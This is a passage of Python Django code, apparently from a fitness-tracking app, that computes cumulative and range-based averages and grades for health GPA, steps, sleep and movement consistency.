self.custom_ranges = [(self._str_to_dt(r[0]),self._str_to_dt(r[1]))
for r in list(self.grouped(self.custom_ranges.split(","),2,None))
if r[0] and r[1]]
self.cumulative_datewise_data_custom_range = {q.created_at.strftime("%Y-%m-%d"):q
for q in self._get_cum_queryset_custom_range(self.custom_ranges)}
if not self.current_date:
self.duration_type = []
for r in self.custom_ranges:
str_range = r[0].strftime("%Y-%m-%d")+" to "+r[1].strftime("%Y-%m-%d")
if not r[1] == r[0]:
self.duration_denominator[str_range] = (r[1] - r[0]).days + 1
else:
self.duration_denominator[str_range] = 1
self.custom_daterange = True
summaries = query_params.get('summary',None)
if summaries:
# Remove all the summary types except for what
# is requested
summaries = [item.strip() for item in summaries.strip().split(',')]
allowed = set(summaries)
existing = set(self.summary_type)
for s in existing-allowed:
self.summary_type.pop(self.summary_type.index(s))
duration = query_params.get('duration',None)
# Remove all the duration types except for what
# is requested
if duration and self.current_date:
duration = [item.strip() for item in duration.strip().split(',')]
allowed = set(duration)
existing = set(self.duration_type)
for d in existing-allowed:
self.duration_type.pop(self.duration_type.index(d))
self.todays_cum_data = self._get_todays_cum_data()
@property
def todays_cum_data(self):
return self.__todays_cum_data
@todays_cum_data.setter
def todays_cum_data(self,data):
self.__todays_cum_data = data
def _get_todays_cum_data(self):
'''
Create todays cumulative data by merging todays raw report
and yesterday cumulative sum (if available) and user inputs
data
'''
todays_ql_data = self.ql_datewise_data.get(
self.current_date.strftime("%Y-%m-%d"),None)
todays_ui_data = self.ui_datewise_data.get(
self.current_date.strftime("%Y-%m-%d"),None)
todays_aa_data = self.aa_datewise_data.get(
self.current_date.strftime("%Y-%m-%d"),None)
yesterday_data = self.cumulative_datewise_data.get(
(self.current_date-timedelta(days=1)).strftime("%Y-%m-%d"),None)
todays_cum = None
if todays_ql_data:
if yesterday_data:
todays_cum = ToCumulativeSum(
self.user,
todays_ql_data,
todays_ui_data,
todays_aa_data,
yesterday_data
)
else:
todays_cum = ToCumulativeSum(
self.user,
todays_ql_data,
todays_ui_data,
todays_aa_data
)
return todays_cum
def _str_to_dt(self,dt_str):
if dt_str:
return datetime.strptime(dt_str, "%Y-%m-%d")
else:
return None
def _hours_to_hours_min(self,hours):
if hours:
mins = hours * 60
hours,mins = divmod(mins,60)
hours = round(hours)
if mins < 59:
# if minute is less than 59 then round it
# otherwise don't because it'll be rounded to
# 60 and look like 5:60 which is incorrect
mins = round(mins)
else:
mins = int(mins)
if mins < 10:
mins = "{:02d}".format(mins)
return "{}:{}".format(hours,mins)
return "00:00"
def _min_to_min_sec(self,mins):
if mins:
seconds = mins * 60
mins,seconds = divmod(seconds,60)
mins = round(mins)
if seconds < 59:
seconds = round(seconds)
else:
seconds = int(seconds)
if seconds < 10:
seconds = "{:02d}".format(seconds)
return "{}:{}".format(mins,seconds)
return "00:00"
	def _get_average(self, stat1, stat2, denominator):
		if denominator:
			avg = (stat1 - stat2)/denominator
			return avg
		return 0
def _get_average_for_duration(self, stat1, stat2, duration_type):
		if stat1 is not None and stat2 is not None:
denominator = self.duration_denominator.get(duration_type)
return self._get_average(stat1,stat2,denominator)
return 0
def _get_model_related_fields_names(self,model):
related_fields_names = [f.name for f in model._meta.get_fields()
if (f.one_to_many or f.one_to_one)
and f.auto_created and not f.concrete]
return related_fields_names
def _get_first_from_year_start_date(self):
'''
Return the date of first cumulative sum record from the
start of the year(Jan 1,inclusive).If there is no record
then returns the default date Jan 1 of the current year.
'''
year_start = datetime(self.current_date.year,1,1)
year_end = year_start - timedelta(days=1)
first_from_year_start = CumulativeSum.objects.filter(
created_at__gte=year_end,
user = self.user
).order_by('created_at')[:1]
try:
qobj = first_from_year_start[0]
return datetime(qobj.created_at.year,
qobj.created_at.month,
qobj.created_at.day) + timedelta(days=1)
except IndexError:
return year_start
def _get_cum_queryset(self):
"""
Returns queryset of CumulativeSum for "today", "yesterday",
"day before yesterday","week", "month", "year" according
to current date
"""
duration_end_dt = self._get_duration_datetime(self.current_date)
user = self.user
# duration_end_dt.pop('today') # no need of today
day_before_yesterday = self.current_date - timedelta(days=2)
filters = Q(created_at=day_before_yesterday)
for d in duration_end_dt.values():
filters |= Q(created_at=d)
related_fields = self._get_model_related_fields_names(CumulativeSum)
cumulative_data_qs = CumulativeSum.objects.select_related(*related_fields).filter(
filters,user=user
)
return cumulative_data_qs
def _get_ql_queryset(self):
"""
Returns queryset of Quicklook for "today"
according to current_date
"""
user = self.user
filters = Q(created_at=self.current_date.date())
related_fields = self._get_model_related_fields_names(UserQuickLook)
ql_data_qs = UserQuickLook.objects.select_related(*related_fields).filter(
filters, user = user
)
return ql_data_qs
def _get_ui_queryset(self):
"""
Returns queryset of User Inputs for "today"
according to current_date
"""
user = self.user
filters = Q(created_at=self.current_date.date())
related_fields = self._get_model_related_fields_names(UserDailyInput)
ui_data_qs = UserDailyInput.objects.select_related(*related_fields).filter(
filters, user = user
)
return ui_data_qs
def _get_cum_queryset_custom_range(self,custom_ranges):
user = self.user
filters = Q()
for r in custom_ranges:
day_before_from_date = r[0] - timedelta(days=1)
filters |= Q(Q(created_at=r[1].date()) | Q (created_at=day_before_from_date.date()))
related_fields = self._get_model_related_fields_names(CumulativeSum)
cumulative_data_qs = CumulativeSum.objects.select_related(*related_fields).filter(
filters, user = user
)
return cumulative_data_qs
def _get_duration_datetime(self,current_date):
duration = {
'today': current_date.date(),
'yesterday':(current_date - timedelta(days=1)).date(),
# Avg excluding today
'week':(current_date - timedelta(days=8)).date(),
'month':(current_date - timedelta(days=31)).date(),
#from start of the year to current date
'year':(self.year_start - timedelta(days=1)).date()
}
return duration
def _get_last_three_days_data(self,summary_type):
'''
		Return the cumulative data for the specified summary type and the
		cumulative 'meta' data for today, yesterday and the day before
		yesterday (calculated from the current date)
		Args:
			summary_type(string): Summary type for which cumulative data is
			required. Possible summary types are defined in self.summary_type
		Returns:
			dict: A dictionary whose values are tuples. Each tuple has the
			following values, in order -
1) Cumulative data of particular summary type
2) cumulative data for meta summary
'''
todays_data = None
todays_meta_data = None
yesterday_data = self.cumulative_datewise_data.get(
(self.current_date-timedelta(days=1)).strftime("%Y-%m-%d"),None)
yesterday_meta_data = None
day_before_yesterday_data = self.cumulative_datewise_data.get(
(self.current_date-timedelta(days=2)).strftime("%Y-%m-%d"),None)
day_before_yesterday_meta_data = None
if self.todays_cum_data:
todays_meta_data = self.todays_cum_data.__dict__.get("meta_cum")
todays_data = self.todays_cum_data.__dict__.get(summary_type)
if yesterday_data:
# Because of select related, attribute names become "_attrname_cache"
cached_summary_type = "_{}_cache".format(summary_type)
yesterday_meta_data = yesterday_data.__dict__.get("_meta_cum_cache")
yesterday_data = yesterday_data.__dict__.get(cached_summary_type)
if day_before_yesterday_data:
cached_summary_type = "_{}_cache".format(summary_type)
day_before_yesterday_meta_data = day_before_yesterday_data.__dict__.get("_meta_cum_cache")
day_before_yesterday_data = day_before_yesterday_data.__dict__.get(cached_summary_type)
data = {
"today":(todays_data,todays_meta_data),
"yesterday":(yesterday_data,yesterday_meta_data),
"day_before_yesterday":(
day_before_yesterday_data,
day_before_yesterday_meta_data
)
}
return data
def _generic_custom_range_calculator(self,key,alias,summary_type,custom_avg_calculator):
'''
Generates averages for provided summary type for custom ranges,
similar to the _generic_summary_calculator.
Args:
			key(str): Key for which the average needs to be calculated. This
			corresponds to the keys in the 'calculated_data' dict.
			alias(str): Duration type for which the average needs to be
			calculated. In this case it will be 'custom_range'
summary_type(string): Summary type for which averages to be
calculated. This summary type is the relative name of the
model which stores the cumulative data of any summary type
mentioned in self.summary_type. For example, model of
summary type "overall_health" have relative name
"overall_health_grade_cum"
custom_avg_calculator (function): A function which have average
logic for every field in given summary type.
'''
custom_average_data = {}
for r in self.custom_ranges:
#for select related
to_select_related = lambda x : "_{}_cache".format(x)
day_before_from_date = r[0] - timedelta(days=1)
todays_ui_data = self.ui_datewise_data.get(
self.current_date.strftime("%Y-%m-%d"),None)
todays_aa_data = self.aa_datewise_data.get(
self.current_date.strftime("%Y-%m-%d"),None)
range_start_data = self.cumulative_datewise_data_custom_range.get(
day_before_from_date.strftime("%Y-%m-%d"),None
)
range_end_data = self.cumulative_datewise_data_custom_range.get(
r[1].strftime("%Y-%m-%d"),None
)
format_summary_name = True
if not range_end_data and r[1] == self.current_date:
yesterday_cum_data = self.cumulative_datewise_data.get(
(r[1]-timedelta(days=1)).strftime("%Y-%m-%d"),None
)
range_end_data = self.ql_datewise_data.get(
r[1].strftime("%Y-%m-%d"),None
)
if range_end_data and yesterday_cum_data:
range_end_data = ToCumulativeSum(
self.user,range_end_data,todays_ui_data,todays_aa_data,yesterday_cum_data
)
format_summary_name = False
str_range = r[0].strftime("%Y-%m-%d")+" to "+r[1].strftime("%Y-%m-%d")
if range_start_data and range_end_data:
range_start_meta_data = range_start_data.__dict__.get(to_select_related("meta_cum"))
range_start_data = range_start_data.__dict__.get(to_select_related(summary_type))
tmp_summary_type = summary_type
tmp_meta_summary = "meta_cum"
if format_summary_name:
tmp_summary_type = to_select_related(summary_type)
tmp_meta_summary = to_select_related(tmp_meta_summary)
range_end_meta_data = range_end_data.__dict__.get(tmp_meta_summary)
range_end_data = range_end_data.__dict__.get(tmp_summary_type)
ravg = {
"from_dt":r[0].strftime("%Y-%m-%d"),
"to_dt":r[1].strftime("%Y-%m-%d"),
"data":custom_avg_calculator(key,str_range,range_end_data,range_start_data,
range_end_meta_data,range_start_meta_data)
}
else:
ravg = {
"from_dt":r[0].strftime("%Y-%m-%d"),
"to_dt":r[1].strftime("%Y-%m-%d"),
"data":None
}
custom_average_data[str_range] = ravg
return custom_average_data
def _generic_summary_calculator(self,calculated_data_dict,avg_calculator,summary_type):
'''
		Generates averages for the provided summary type over all ranges
		(today, yesterday, etc.) except custom ranges
Args:
calculated_data_dict (dict): Dictionary where average for
any field (eg overall_health_gpa) in given summary type
(eg overall_health_grade_cum) is calculated and stored
by mutating this dictionary
avg_calculator (function): A function which have average logic
for every field in given summary type.
summary_type(string): Summary type for which averages to be
calculated. This summary type is the relative name of the
model which stores the cumulative data of any summary type
mentioned in self.summary_type. For example, model of
summary type "overall_health" have relative name
"overall_health_grade_cum"
'''
last_three_days_data = self._get_last_three_days_data(summary_type)
todays_data,todays_meta_data = last_three_days_data["today"]
yesterday_data,yesterday_meta_data = last_three_days_data["yesterday"]
day_before_yesterday_data,day_before_yesterday_meta_data = last_three_days_data[
"day_before_yesterday"
]
for key in calculated_data_dict.keys():
for alias, dtobj in self._get_duration_datetime(self.current_date).items():
if alias in self.duration_type:
current_data = self.cumulative_datewise_data.get(dtobj.strftime("%Y-%m-%d"),None)
current_meta_data = None
if current_data:
cached_summary_type = "_{}_cache".format(summary_type)
current_meta_data = current_data.__dict__.get("_meta_cum_cache")
current_data = current_data.__dict__.get(cached_summary_type)
if alias == 'today':
if yesterday_data:
calculated_data_dict[key][alias] = avg_calculator(key,alias,todays_data,
yesterday_data,todays_meta_data,yesterday_meta_data)
continue
elif alias == 'yesterday':
if day_before_yesterday_data:
calculated_data_dict[key][alias] = avg_calculator(key,alias,yesterday_data,
day_before_yesterday_data,yesterday_meta_data,day_before_yesterday_meta_data)
continue
# Avg excluding today, that's why subtract from yesterday's cum sum
calculated_data_dict[key][alias] = avg_calculator(key,alias,yesterday_data,
current_data,yesterday_meta_data,current_meta_data)
def _get_summary_calculator_binding(self):
SUMMARY_CALCULATOR_BINDING = {
"overall_health":self._cal_overall_health_summary,
"non_exercise":self._cal_non_exercise_summary,
"sleep":self._cal_sleep_summary,
"mc":self._cal_movement_consistency_summary,
"ec":self._cal_exercise_consistency_summary,
"nutrition":self._cal_nutrition_summary,
"exercise":self._cal_exercise_summary,
"alcohol":self._cal_alcohol_summary,
"sick":self._cal_sick_summary,
"stress":self._cal_stress_summary,
"travel":self._cal_travel_summary,
"standing":self._cal_standing_summary,
"other":self._cal_other_summary
}
return SUMMARY_CALCULATOR_BINDING
def _create_grade_keys(self, prefix, grades=[]):
if not grades:
grades = ['a','b','c','d','f']
return [prefix+'_'+grade for grade in grades]
def _create_prcnt_grade_keys(self, prefix, grades=[]):
if not grades:
grades = ['a','b','c','d','f']
return ['prcnt_'+prefix+'_'+grade for grade in grades]
def _create_steps_milestone_keys(self, prefix, milestones=[]):
if not milestones:
milestones = ['10k','20k','25k','30k','40k']
return [prefix+'_'+milestone for milestone in milestones]
def _create_prcnt_steps_milestone_keys(self, prefix, milestones=[]):
if not milestones:
milestones = ['10k','20k','25k','30k','40k']
return ['prcnt_'+prefix+'_'+milestone for milestone in milestones]
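	# Illustrative key names produced by the helpers above (not from the source):
	#   self._create_grade_keys('cum_days_ohg_got')
	#       -> ['cum_days_ohg_got_a', ..., 'cum_days_ohg_got_f']
	#   self._create_prcnt_steps_milestone_keys('days_ts_above')
	#       -> ['prcnt_days_ts_above_10k', ..., 'prcnt_days_ts_above_40k']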
def _cal_grade_days_over_period(self, today_catg_data, current_catg_data,
key, days_over_period=None):
'''
Calculate the grade bifurcation for given category for example,
number of days got A for overall health gpa (cum_ohg_days_got_a)
etc.
'''
days_till_today = today_catg_data.__dict__[key]
days_till_current = current_catg_data.__dict__[key]
val = days_till_today - days_till_current
if val and days_over_period is not None and not days_over_period:
return 0
return val
def _cal_prcnt_grade_over_period(self, today_catg_data,current_catg_data,
key,duration_type, days_over_period=None):
'''
Calculate the percentage for grade bifurcation for given
category for example, percentage number of days got A for
overall health gpa (prcnt_ohg_days_got_a) for given duration
etc.
Args:
duration_type(string): today, yesterday, week, month, year etc.
			days_over_period (int): Manual number of days over the period;
			defaults to None
'''
denominator = self.duration_denominator.get(duration_type)
if days_over_period:
denominator = days_over_period
# create grade key from percentage key
# example - prcnt_ohg_days_got_a -> cum_ohg_days_got_a
grade_key = key.replace("prcnt","cum")
days_till_today = today_catg_data.__dict__[grade_key]
days_till_current = current_catg_data.__dict__[grade_key]
val = days_till_today - days_till_current
prcnt = 0
if denominator:
prcnt = (val/denominator)*100
prcnt = int(Decimal(prcnt).quantize(0,ROUND_HALF_UP))
return prcnt
def _cal_steps_milestone_days_over_period(self, today_catg_data, current_catg_data, key):
'''
Calculate the steps bifurcation for non-exercise or total steps.
for example, number of days got total steps over 10,000
(cum_ts_days_above_10k) etc.
'''
days_till_today = today_catg_data.__dict__[key]
days_till_current = current_catg_data.__dict__[key]
val = days_till_today - days_till_current
return val
def _cal_prcnt_steps_milestone_over_period(self, today_catg_data, current_catg_data,
key, duration_type):
'''
Calculate the percentage for steps bifurcation for total or
non-exercise steps for example, percentage number of days got
steps over 10,000 (prcnt_ts_days_above_10k)for given duration.
Args:
duration_type(string): today, yesterday, week, month, year etc.
'''
denominator = self.duration_denominator.get(duration_type)
grade_key = key.replace("prcnt","cum")
days_till_today = today_catg_data.__dict__[grade_key]
days_till_current = current_catg_data.__dict__[grade_key]
val = days_till_today - days_till_current
prcnt = 0
if denominator:
prcnt = (val/denominator)*100
prcnt = int(Decimal(prcnt).quantize(0,ROUND_HALF_UP))
return prcnt
def _cal_overall_health_summary(self,custom_daterange = False):
grades_bifurcation_keys = self._create_grade_keys('cum_days_ohg_got')
grades_prcnt_bifurcation_keys = self._create_prcnt_grade_keys('days_ohg_got')
def _calculate(key,alias,todays_data,current_data,
todays_meta_data,current_meta_data):
if todays_data and current_data:
if key =='total_gpa_point':
val = self._get_average_for_duration(
todays_data.cum_total_gpa_point,
current_data.cum_total_gpa_point,alias
)
return round(val,2)
elif key == 'overall_health_gpa':
val = self._get_average_for_duration(
todays_data.cum_overall_health_gpa_point,
current_data.cum_overall_health_gpa_point,alias
)
return round(val,2)
elif key == 'overall_health_gpa_grade':
return garmin_calculation.cal_overall_grade(
self._get_average_for_duration(
todays_data.cum_overall_health_gpa_point,
current_data.cum_overall_health_gpa_point,alias
)
)[0]
elif key in grades_bifurcation_keys:
return self._cal_grade_days_over_period(todays_data,
current_data,
key)
elif key in grades_prcnt_bifurcation_keys:
return self._cal_prcnt_grade_over_period(todays_data,
current_data,
key, alias)
return None
calculated_data = {
'total_gpa_point':{d:None for d in self.duration_type},
'overall_health_gpa':{d:None for d in self.duration_type},
'overall_health_gpa_grade':{d:None for d in self.duration_type}
}
calculated_data.update({key:{d:None for d in self.duration_type}
for key in grades_bifurcation_keys})
calculated_data.update({key:{d:None for d in self.duration_type}
for key in grades_prcnt_bifurcation_keys})
summary_type = "overall_health_grade_cum"
if custom_daterange:
alias = "custom_range"
for key in calculated_data.keys():
calculated_data[key][alias] = self._generic_custom_range_calculator(
key, alias, summary_type, _calculate
)
if self.current_date:
self._generic_summary_calculator(calculated_data,_calculate,summary_type)
return calculated_data
def _cal_non_exercise_summary(self,custom_daterange = False):
grades_bifurcation_keys = self._create_grade_keys('cum_days_nes_got')
grades_bifurcation_keys += self._create_grade_keys('cum_days_ts_got')
grades_prcnt_bifurcation_keys = self._create_prcnt_grade_keys('days_ts_got')
grades_prcnt_bifurcation_keys += self._create_prcnt_grade_keys('days_nes_got')
milestone_bifurcation_keys = self._create_steps_milestone_keys('cum_days_nes_above')
milestone_bifurcation_keys += self._create_steps_milestone_keys('cum_days_ts_above')
milestone_prcnt_bifurcation_keys = self._create_prcnt_steps_milestone_keys(
'days_nes_above')
milestone_prcnt_bifurcation_keys += self._create_prcnt_steps_milestone_keys(
'days_ts_above')
def _calculate(key, alias,todays_data,current_data,
todays_meta_data,current_meta_data):
if todays_data and current_data:
if key =='non_exercise_steps':
val = self._get_average_for_duration(
todays_data.cum_non_exercise_steps,
current_data.cum_non_exercise_steps,alias)
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
elif key == 'non_exericse_steps_gpa':
val = self._get_average_for_duration(
todays_data.cum_non_exercise_steps_gpa,
current_data.cum_non_exercise_steps_gpa,alias)
return round(val,2)
elif key == 'total_steps':
val = self._get_average_for_duration(
todays_data.cum_total_steps,
current_data.cum_total_steps,alias)
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
elif key == 'movement_non_exercise_step_grade':
return garmin_calculation.cal_non_exercise_step_grade(
self._get_average_for_duration(
todays_data.cum_non_exercise_steps,
current_data.cum_non_exercise_steps,alias
)
)[0]
elif key == 'exercise_steps':
total_steps = self._get_average_for_duration(
todays_data.cum_total_steps,
current_data.cum_total_steps,alias)
non_exec_steps = self._get_average_for_duration(
todays_data.cum_non_exercise_steps,
current_data.cum_non_exercise_steps,alias)
exercise_steps = total_steps - non_exec_steps
return int(Decimal(exercise_steps).quantize(0,ROUND_HALF_UP))
elif key in grades_bifurcation_keys:
return self._cal_grade_days_over_period(todays_data,
current_data,
key)
elif key in grades_prcnt_bifurcation_keys:
return self._cal_prcnt_grade_over_period(todays_data,
current_data,
key, alias)
elif key in milestone_bifurcation_keys:
return self._cal_steps_milestone_days_over_period(todays_data,
current_data,
key)
elif key in milestone_prcnt_bifurcation_keys:
return self._cal_prcnt_steps_milestone_over_period(todays_data,
current_data,
key, alias)
return None
calculated_data = {
'non_exercise_steps':{d:None for d in self.duration_type},
'movement_non_exercise_step_grade':{d:None for d in self.duration_type},
'non_exericse_steps_gpa':{d:None for d in self.duration_type},
'total_steps':{d:None for d in self.duration_type},
'exercise_steps':{d:None for d in self.duration_type}
}
calculated_data.update({key:{d:None for d in self.duration_type}
for key in grades_bifurcation_keys})
calculated_data.update({key:{d:None for d in self.duration_type}
for key in grades_prcnt_bifurcation_keys})
calculated_data.update({key:{d:None for d in self.duration_type}
for key in milestone_bifurcation_keys})
calculated_data.update({key:{d:None for d in self.duration_type}
for key in milestone_prcnt_bifurcation_keys})
summary_type = "non_exercise_steps_cum"
if custom_daterange:
alias = "custom_range"
for key in calculated_data.keys():
calculated_data[key][alias] = self._generic_custom_range_calculator(
key, alias,summary_type, _calculate
)
if self.current_date:
self._generic_summary_calculator(calculated_data,_calculate,summary_type)
return calculated_data
def _cal_sleep_summary(self,custom_daterange = False):
grades_bifurcation_keys = self._create_grade_keys('cum_days_sleep_got')
grades_prcnt_bifurcation_keys = self._create_prcnt_grade_keys('days_sleep_got')
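        # Grade-from-GPA thresholds below are used for multi-day ranges; single
        # days (today/yesterday) go through
        # garmin_calculation._get_sleep_grade_from_point instead.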
def _get_sleep_grade_from_point_for_ranges(point):
if point < 1:
return 'F'
elif point >= 1 and point < 2:
return 'D'
elif point >= 2 and point < 2.8:
return 'C'
elif point >= 2.8 and point < 3.3:
return 'B'
else:
return 'A'
        def _cal_custom_average(stat1, stat2, days):
            if stat1 is not None and stat2 is not None and days:
                return (stat1 - stat2) / days
            return 0
def _calculate(key,alias,todays_data,current_data,
todays_meta_data,current_meta_data):
if todays_data and current_data:
if key == 'total_sleep_in_hours_min':
if todays_meta_data and current_meta_data:
sleep_days = (
todays_meta_data.cum_sleep_reported_days_count -
current_meta_data.cum_sleep_reported_days_count
)
if sleep_days:
val = _cal_custom_average(
todays_data.cum_total_sleep_in_hours,
current_data.cum_total_sleep_in_hours,sleep_days)
return self._hours_to_hours_min(val)
else:
return "00:00"
if key == 'deep_sleep_in_hours_min':
if todays_meta_data and current_meta_data:
sleep_days = (
todays_meta_data.cum_sleep_reported_days_count -
current_meta_data.cum_sleep_reported_days_count
)
if sleep_days:
val = _cal_custom_average(
todays_data.cum_deep_sleep_in_hours,
current_data.cum_deep_sleep_in_hours,sleep_days)
return self._hours_to_hours_min(val)
else:
return "00:00"
if key == 'awake_duration_in_hours_min':
if todays_meta_data and current_meta_data:
sleep_days = (
todays_meta_data.cum_sleep_reported_days_count -
current_meta_data.cum_sleep_reported_days_count
)
if sleep_days:
val = _cal_custom_average(
todays_data.cum_awake_duration_in_hours,
current_data.cum_awake_duration_in_hours,sleep_days)
return self._hours_to_hours_min(val)
else:
return "00:00"
elif key == 'overall_sleep_gpa':
if todays_meta_data and current_meta_data:
sleep_days = (
todays_meta_data.cum_sleep_reported_days_count -
current_meta_data.cum_sleep_reported_days_count
)
if sleep_days:
val = _cal_custom_average(
todays_data.cum_overall_sleep_gpa,
current_data.cum_overall_sleep_gpa,sleep_days)
return round(val,2)
else:
return 0
elif key == 'average_sleep_grade':
if todays_meta_data and current_meta_data:
sleep_days = (
todays_meta_data.cum_sleep_reported_days_count -
current_meta_data.cum_sleep_reported_days_count
)
if sleep_days:
avg_sleep_gpa = round(_cal_custom_average(
todays_data.cum_overall_sleep_gpa,
current_data.cum_overall_sleep_gpa,sleep_days),2)
if alias == 'today' or alias == 'yesterday':
return garmin_calculation._get_sleep_grade_from_point(avg_sleep_gpa)
else:
return _get_sleep_grade_from_point_for_ranges(avg_sleep_gpa)
else:
return 'F'
elif key == 'num_days_sleep_aid_taken_in_period':
if todays_meta_data and current_meta_data:
val = 0
if ((todays_data.cum_days_sleep_aid_taken is not None) and
(current_data.cum_days_sleep_aid_taken is not None)):
val = todays_data.cum_days_sleep_aid_taken - current_data.cum_days_sleep_aid_taken
return val
elif key == 'prcnt_days_sleep_aid_taken_in_period':
if todays_meta_data and current_meta_data:
val = 0
if((todays_data.cum_days_sleep_aid_taken is not None) and
(current_data.cum_days_sleep_aid_taken is not None)):
val = todays_data.cum_days_sleep_aid_taken - current_data.cum_days_sleep_aid_taken
prcnt = 0
if val:
                            # if the duration denominator is greater than 0
if self.duration_denominator[alias]:
prcnt = (val / self.duration_denominator[alias])*100
prcnt = int(Decimal(prcnt).quantize(0,ROUND_HALF_UP))
return prcnt
elif key in grades_bifurcation_keys:
if todays_meta_data and current_meta_data:
sleep_days = (
todays_meta_data.cum_sleep_reported_days_count -
current_meta_data.cum_sleep_reported_days_count
)
return self._cal_grade_days_over_period(todays_data,current_data,
key, sleep_days)
elif key in grades_prcnt_bifurcation_keys:
if todays_meta_data and current_meta_data:
sleep_days = (
todays_meta_data.cum_sleep_reported_days_count -
current_meta_data.cum_sleep_reported_days_count
)
return self._cal_prcnt_grade_over_period(todays_data,current_data,
key, alias, sleep_days)
return None
calculated_data = {
'total_sleep_in_hours_min':{d:None for d in self.duration_type},
'deep_sleep_in_hours_min':{d:None for d in self.duration_type},
'awake_duration_in_hours_min':{d:None for d in self.duration_type},
'average_sleep_grade':{d:None for d in self.duration_type},
'num_days_sleep_aid_taken_in_period':{d:None for d in self.duration_type},
'prcnt_days_sleep_aid_taken_in_period':{d:None for d in self.duration_type},
'overall_sleep_gpa':{d:None for d in self.duration_type},
}
calculated_data.update({key:{d:None for d in self.duration_type}
for key in grades_bifurcation_keys})
calculated_data.update({key:{d:None for d in self.duration_type}
for key in grades_prcnt_bifurcation_keys})
summary_type = "sleep_per_night_cum"
if custom_daterange:
alias = "custom_range"
for key in calculated_data.keys():
calculated_data[key][alias] = self._generic_custom_range_calculator(
key, alias,summary_type, _calculate
)
if self.current_date:
self._generic_summary_calculator(calculated_data,_calculate,summary_type)
return calculated_data
def _cal_movement_consistency_summary(self,custom_daterange = False):
grades_bifurcation_keys = self._create_grade_keys('cum_days_mcs_got')
grades_bifurcation_keys += self._create_grade_keys('cum_days_total_act_min_got')
grades_bifurcation_keys += self._create_grade_keys('cum_days_act_min_no_sleep_exec_got')
grades_prcnt_bifurcation_keys = self._create_prcnt_grade_keys('days_mcs_got')
grades_prcnt_bifurcation_keys += self._create_prcnt_grade_keys('days_total_act_min_got')
grades_prcnt_bifurcation_keys += self._create_prcnt_grade_keys('days_act_min_no_sleep_exec_got')
        def _cal_custom_average(stat1, stat2, days):
            if stat1 is not None and stat2 is not None and days:
                return (stat1 - stat2) / days
            return 0
def _calculate(key,alias,todays_data,current_data,
todays_meta_data,current_meta_data):
if todays_data and current_data:
if key =='movement_consistency_score':
if todays_meta_data and current_meta_data:
mc_days = (
todays_meta_data.cum_mc_recorded_days_count -
current_meta_data.cum_mc_recorded_days_count
)
val = _cal_custom_average(
todays_data.cum_movement_consistency_score,
current_data.cum_movement_consistency_score,
mc_days)
if mc_days:
return round(val,2)
else:
return "Not Reported"
return None
elif key == 'movement_consistency_gpa':
if todays_meta_data and current_meta_data:
mc_days = (
todays_meta_data.cum_mc_recorded_days_count -
current_meta_data.cum_mc_recorded_days_count
)
val = _cal_custom_average(
todays_data.cum_movement_consistency_gpa,
current_data.cum_movement_consistency_gpa,
mc_days)
if mc_days:
return round(val,2)
else:
return "Not Reported"
return None
elif key == 'movement_consistency_grade':
if todays_meta_data and current_meta_data:
mc_days = (
todays_meta_data.cum_mc_recorded_days_count -
current_meta_data.cum_mc_recorded_days_count
)
grade = garmin_calculation.cal_movement_consistency_grade(
_cal_custom_average(
todays_data.cum_movement_consistency_score,
current_data.cum_movement_consistency_score,
mc_days
)
)
if mc_days:
return grade
else:
return "Not Reported"
return None
elif key == "total_active_minutes":
if todays_meta_data and current_meta_data:
mc_days = (
todays_meta_data.cum_mc_recorded_days_count -
current_meta_data.cum_mc_recorded_days_count
)
value = round(_cal_custom_average(
todays_data.cum_total_active_min,
current_data.cum_total_active_min,
mc_days))
if mc_days:
return value
else:
return "Not Reported"
elif key == "sleep_active_minutes":
if todays_meta_data and current_meta_data:
mc_days = (
todays_meta_data.cum_mc_recorded_days_count -
current_meta_data.cum_mc_recorded_days_count
)
value = round(_cal_custom_average(
todays_data.cum_sleep_active_min,
current_data.cum_sleep_active_min,
mc_days))
if mc_days:
return value
else:
return "Not Reported"
elif key == "exercise_active_minutes":
if todays_meta_data and current_meta_data:
mc_days = (
todays_meta_data.cum_mc_recorded_days_count -
current_meta_data.cum_mc_recorded_days_count
)
value = round(_cal_custom_average(
todays_data.cum_exercise_active_min,
current_data.cum_exercise_active_min,
mc_days))
if mc_days:
return value
else:
return "Not Reported"
elif key == "active_minutes_without_sleep":
if todays_meta_data and current_meta_data:
mc_days = (
todays_meta_data.cum_mc_recorded_days_count -
current_meta_data.cum_mc_recorded_days_count
)
act_min_without_sleep_today = (
todays_data.cum_total_active_min
- todays_data.cum_sleep_active_min)
act_min_without_sleep_currently = (
current_data.cum_total_active_min
- current_data.cum_sleep_active_min)
value = round(_cal_custom_average(
act_min_without_sleep_today,
act_min_without_sleep_currently,
mc_days))
if mc_days:
return value
else:
return "Not Reported"
elif key == "active_minutes_without_sleep_exercise":
if todays_meta_data and current_meta_data:
mc_days = (
todays_meta_data.cum_mc_recorded_days_count -
current_meta_data.cum_mc_recorded_days_count
)
act_min_without_sleep_exercise_today = (
todays_data.cum_total_active_min
- todays_data.cum_sleep_active_min
- todays_data.cum_exercise_active_min)
act_min_without_sleep_exercise_currently = (
current_data.cum_total_active_min
- current_data.cum_sleep_active_min
- current_data.cum_exercise_active_min)
value = round(_cal_custom_average(
act_min_without_sleep_exercise_today,
act_min_without_sleep_exercise_currently,
mc_days))
if mc_days:
return value
else:
return "Not Reported"
elif key == "total_active_minutes_prcnt":
if todays_meta_data and current_meta_data:
mc_days = (
todays_meta_data.cum_mc_recorded_days_count -
current_meta_data.cum_mc_recorded_days_count
)
value = round(_cal_custom_average(
todays_data.cum_total_active_min,
current_data.cum_total_active_min,
mc_days))
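                        # 1440 = minutes in a day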
active_prcnt = round((value/1440)*100)
if mc_days:
return active_prcnt
else:
return "Not Reported"
elif key == "active_minutes_without_sleep_prcnt":
if todays_meta_data and current_meta_data:
mc_days = (
todays_meta_data.cum_mc_recorded_days_count
- current_meta_data.cum_mc_recorded_days_count
)
act_min_without_sleep_today = (
todays_data.cum_total_active_min
- todays_data.cum_sleep_active_min)
act_min_without_sleep_currently = (
current_data.cum_total_active_min
- current_data.cum_sleep_active_min)
avg_sleep_mins = round(_cal_custom_average(
todays_data.cum_sleep_hours,
current_data.cum_sleep_hours,
mc_days
))
total_mins_without_sleep = 1440 - (avg_sleep_mins)
value = round(_cal_custom_average(
act_min_without_sleep_today,
act_min_without_sleep_currently,
mc_days))
try:
active_prcnt = round((
value/total_mins_without_sleep)*100)
except ZeroDivisionError:
active_prcnt = 0
if mc_days:
return active_prcnt
else:
return "Not Reported"
